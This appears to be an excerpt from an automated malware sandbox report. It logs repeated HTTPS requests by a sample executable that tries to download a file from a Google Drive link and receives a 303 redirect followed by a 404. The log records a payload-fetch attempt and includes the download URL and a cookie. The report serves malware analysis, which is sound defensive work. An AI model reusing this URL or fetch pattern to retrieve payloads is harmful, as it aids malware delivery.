                                                    Content-Security-Policy: script-src 'nonce-2WJilx22vwE-3I2mNehwWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                    25  192.168.2.7  52192  142.250.186.161  443  4640  C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp  Bytes transferred  Direction  Data
                                                    2025-01-10 14:39:32 UTC  459  OUT  GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:32 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgT369MaVz7SBWW5aXPsFnbCZnmQdtHAOgoCTmGUNYQfg9o7bHeHXCgJ1M6nT8dQiAzh
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:32 GMT
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: script-src 'nonce-4rdDBkOrW1OOWULK-x3XWg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:32 UTC | 1652 | IN
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="71xhfsclCF9oMeOoYXW43A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    26 | 192.168.2.7 | 52203 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:39:33 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:34 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:33 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-2gk-K7YLXLtQtuGqE2y8qg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    27 | 192.168.2.7 | 52209 | 142.250.186.161 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:39:34 UTC | 459 | OUT | GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:35 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgQkmAeXebdqmTqi1yeU223BM4MhkOaYxpsVASarLDNC5tgdIZ_60Kp25UC08eSzoWHb
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:34 GMT
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy: script-src 'nonce-M4JJoc1_47xTWYvAu-RR0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:35 UTC | 1652 | IN
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ryd-ICaEojeXWFMg8MCzHA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    28 | 192.168.2.7 | 52212 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:39:35 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:36 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:36 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-jh9AcGyeAQQWRmT9vYc0Hw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    29 | 192.168.2.7 | 52213 | 142.250.186.161 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:39:36 UTC | 459 | OUT | GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:37 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFiumC6ESL8IBcz6NFrGm2s2pPvteangT7aX8Xgg8YnHLKm3TYyFaCcA00icFnlS0dErSQsauGXYbJo
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:37 GMT
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-Bg-1oG4AlEhkaFS1cJdBFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:37 UTC | 1652 | IN
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="qWLOlDn2XLqK9SYpFHOsAg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    30 | 192.168.2.7 | 52214 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:39:38 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:38 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:38 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-DAA9hbvoYYVYzxLwq_k-HA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    31 | 192.168.2.7 | 52215 | 142.250.186.161 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:39:39 UTC | 459 | OUT | GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:39 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFiumC6PgHZhhCKPNxdk4ClD9AhID3JFGwhxeUAxtV7mFi5rjTzbIAkuvZDjbUqNwFm3ca1Z
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:39 GMT
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-gHANx6DOk3FawaEJdlU1wg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:39 UTC | 1652 | IN
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="lKkr7D4TYUpJ5fYplADf6Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    32 | 192.168.2.7 | 52217 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:39:40 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:40 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:40 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Security-Policy: script-src 'nonce-uamMN-N2WmfIiS7w5YTQ7w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    33 | 192.168.2.7 | 52218 | 142.250.186.161 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:39:41 UTC | 459 | OUT | GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:42 UTC | 1851 | IN | HTTP/1.1 404 Not Found
